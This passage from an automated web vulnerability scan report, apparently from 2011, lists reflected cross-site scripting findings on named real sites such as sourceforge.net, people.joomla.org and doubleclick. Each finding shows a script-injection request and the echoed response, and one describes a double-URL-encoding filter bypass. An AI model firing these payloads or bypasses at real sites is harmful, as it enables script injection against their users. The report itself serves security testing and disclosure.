GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=20615019074105c"><script>alert(1)</script>e3d9cdcedea&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:08:42 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 926
Set-Cookie: pjw=BAEAAAACIAMDiz4+TSAGAQABIAMEuuoDACcgBwLqSQcgBUATAQAA; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 03:08:42 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295924922:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 03:08:42 GMT
Set-Cookie: adv_ic=BwEAAAC6Pj5NIAYJAAFJAAAbWQAAJyALAwAAAAA=; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 03:08:42 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 03:08:42 GMT

<a href="http://media.fastclick.net/w/click.here?cid=256698&mid=477674&m=1&sid=54816&c=0&tp=5&exid=3&asite=20615019074105c"><script>alert(1)</script>e3d9cdcedea&vtid=14839&walsh=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-fo
...[SNIP]...

4.176. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a383e"><script>alert(1)</script>608b3697d30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMa383e"><script>alert(1)</script>608b3697d30/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:06:51 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+PksAB3xJ; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DMa383e"><script>alert(1)</script>608b3697d30/DLX/177984454/x96/default/empty.gif/726348573830302b506b73414233784a?x" target="_top"><IMG SRC=
...[SNIP]...

4.177. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dedf"><script>alert(1)</script>4b75d2381cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX1dedf"><script>alert(1)</script>4b75d2381cc/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:07:00 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+PlQAC6bl; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX1dedf"><script>alert(1)</script>4b75d2381cc/836748510/x96/default/empty.gif/726348573830302b506c51414336626c?x" target="_top"><IMG SRC=
...[SNIP]...

4.178. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mig.nexac.com
Path:	/2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac08c"><script>alert(1)</script>2742344f814 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x96ac08c"><script>alert(1)</script>2742344f814 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:07:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+Pl0ADgGc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1154087751/x96ac08c"><script>alert(1)</script>2742344f814/default/empty.gif/726348573830302b506c304144674763?x" target="_top"><IMG SRC
...[SNIP]...

4.179. http://openports.se/news/aub/x22 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://openports.se
Path:	/news/aub/x22

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da8e"-alert(1)-"cced135207a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news5da8e"-alert(1)-"cced135207a/aub/x22 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";

           uri = "http://openports.se/view_port.php?path=/news5da8e"-alert(1)-"cced135207a/aub/x22";
           if (sajax_request_type == "GET") {

               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escap
...[SNIP]...

4.180. http://openports.se/news/aub/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://openports.se
Path:	/news/aub/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db95b"><script>alert(1)</script>12bc1ff0ef5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/aubdb95b"><script>alert(1)</script>12bc1ff0ef5/x22 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
<a href="http://openports.se/news/aubdb95b"><script>alert(1)</script>12bc1ff0ef5/x22">
...[SNIP]...

4.181. http://openports.se/news/aub/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://openports.se
Path:	/news/aub/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5972f"-alert(1)-"a9f703dfef8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/aub5972f"-alert(1)-"a9f703dfef8/x22 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
arget_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";

           uri = "http://openports.se/view_port.php?path=/news/aub5972f"-alert(1)-"a9f703dfef8/x22";
           if (sajax_request_type == "GET") {

               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sa
...[SNIP]...

4.182. http://openports.se/news/aub/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://openports.se
Path:	/news/aub/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3971d"><script>alert(1)</script>61eba753576 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/aub/x223971d"><script>alert(1)</script>61eba753576 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
<a href="http://openports.se/news/aub/x223971d"><script>alert(1)</script>61eba753576">
...[SNIP]...

4.183. http://openports.se/news/aub/x22 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://openports.se
Path:	/news/aub/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efd55"-alert(1)-"8cf2fde9a94 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/aub/x22efd55"-alert(1)-"8cf2fde9a94 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
t_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";

           uri = "http://openports.se/view_port.php?path=/news/aub/x22efd55"-alert(1)-"8cf2fde9a94";
           if (sajax_request_type == "GET") {

               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

4.184. http://openports.se/news/aub/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://openports.se
Path:	/news/aub/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d2c2"-alert(1)-"86792ffaf77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/aub/x22?5d2c2"-alert(1)-"86792ffaf77=1 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";

           uri = "http://openports.se/view_port.php?path=/news/aub/x22?5d2c2"-alert(1)-"86792ffaf77=1";
           if (sajax_request_type == "GET") {

               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(saja
...[SNIP]...

4.185. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html [groupid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The value of the groupid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d was submitted in the groupid parameter. This input was echoed as 1e57e\"><script>alert(1)</script>e630941430d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the groupid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d; expires=Tue, 25-Jan-2011 22:48:53 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:48:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<a href="/groups/viewgroup/7141e57e\"><script>alert(1)</script>e630941430d-.html">
...[SNIP]...

4.186. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload c4594<script>alert(1)</script>2bd00b98417 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1295919341357&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1189370408998555&slotname=Joomla_JoomlacodeSidec4594<script>alert(1)</script>2bd00b98417&page_slots=Joomla_JoomlacodeSide&cookie=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&ga_vid=760811261.1295919318&ga_sid=1295919318&ga_hid=560912139&ga_fc=true&url=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&ref=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Ftracker%2F%3F3ee00%2522style%253d%2522x%253aexpression(alert(1))%2522744e3c5545f%3D1&lmt=1295940941&dt=1295919341362&cc=12&biw=1155&bih=1012&ifi=1&adk=4176925214&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/reporting/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

4.187. http://sourceforge.net/softwaremap/ [fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/softwaremap/

Issue detail

The value of the fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bf8b"><script>alert(1)</script>21a82293602 was submitted in the fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x223bf8b"><script>alert(1)</script>21a82293602 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-8
Set-Cookie: PHPSESSID=ff34ad02dd9584709c9cbdfe4f2a5448; expires=Mon, 07-Feb-2011 16:03:31 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:03:31 GMT
Server: lighttpd/1.4.26
Content-Length: 108116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
~ SourceForge.net: Find and B
...[SNIP]...
<a href="/softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x223bf8b"><script>alert(1)</script>21a82293602&fq%5B%5D=trove%3A688">
...[SNIP]...

4.188. http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sourceforge.net
Path:	/softwaremap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3f06"><script>alert(1)</script>8a4aedca02f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /softwaremap/?a3f06"><script>alert(1)</script>8a4aedca02f=1 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-5
Set-Cookie: PHPSESSID=8d43df6a56cf06198a62868d1753fde0; expires=Mon, 07-Feb-2011 16:03:05 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:03:05 GMT
Server: lighttpd/1.4.26
Content-Length: 86066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
~ SourceForge.net: Find and B
...[SNIP]...
<a href="/softwaremap/?a3f06"><script>alert(1)</script>8a4aedca02f=1&fq%5B%5D=trove%3A688">
...[SNIP]...

4.189. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a960d"><script>alert(1)</script>b7d5247b69c was submitted in the REST URL parameter 1. This input was echoed as a960d\"><script>alert(1)</script>b7d5247b69c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /music-scenea960d"><script>alert(1)</script>b7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:03:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l9al9g2s3e29u7v3gna9e669j0; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:03:34 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:03:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/music-scenea960d\"><script>alert(1)</script>b7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22'; }); return true;" >
...[SNIP]...

4.190. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81402"><script>alert(1)</script>a730c9df6b2 was submitted in the REST URL parameter 2. This input was echoed as 81402\"><script>alert(1)</script>a730c9df6b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

